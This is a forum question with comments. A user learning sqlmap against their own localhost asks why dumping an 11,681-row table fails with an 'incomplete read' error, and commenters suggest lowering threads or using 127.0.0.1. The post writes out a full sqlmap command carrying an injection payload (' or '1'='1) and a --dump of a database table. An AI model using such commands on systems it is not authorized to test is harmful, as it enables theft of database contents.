1

I am learning/working on sqlmap and I was trying to dump a large table with 11K entries on my localhost.

The command I used is:

python sqlmap.py -u "http://localhost/searchre.php" --data="search=' or '1'='1" 
--delay=10 --timeout=100 --random-agent --dump -D Animal -T types --keep-alive --threads=5

It is supposed to dump the types table from the Animal database.

[12:29:36] [INFO] the SQL query used returns 11681 entries

[12:29:36] [INFO] starting 5 threads

[12:29:48] [CRITICAL] there was an incomplete read error while retrieving data 
from the target URL or proxy. sqlmap is going to retry the request(s)

[12:29:48] [WARNING] if the problem persists please try to lower the number of 
used threads (option '--threads')

I tried lowering the threads but all in vain. What should I do in a scenario where the table size is large?

5
  • this is a stab in the dark but have you tried 127.0.01 instead? have you setup local domains?
    – chriz
    Commented May 9, 2016 at 13:45
  • "incomplete read" would appear to mean that the connection was closed before all the threads had completed. Have you lowered the threads to 1?
    – schroeder
    Commented May 9, 2016 at 15:26
  • @chriz yes i did
    – Johnny
    Commented May 10, 2016 at 4:44
  • @schroeder I tried the lowest level that is 1 :) even tried adding delay between requests that is --delay
    – Johnny
    Commented May 10, 2016 at 4:58
  • @Johnny Have you been able to solve your problem yet?
    – Learner
    Commented Sep 28, 2022 at 6:24

0

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.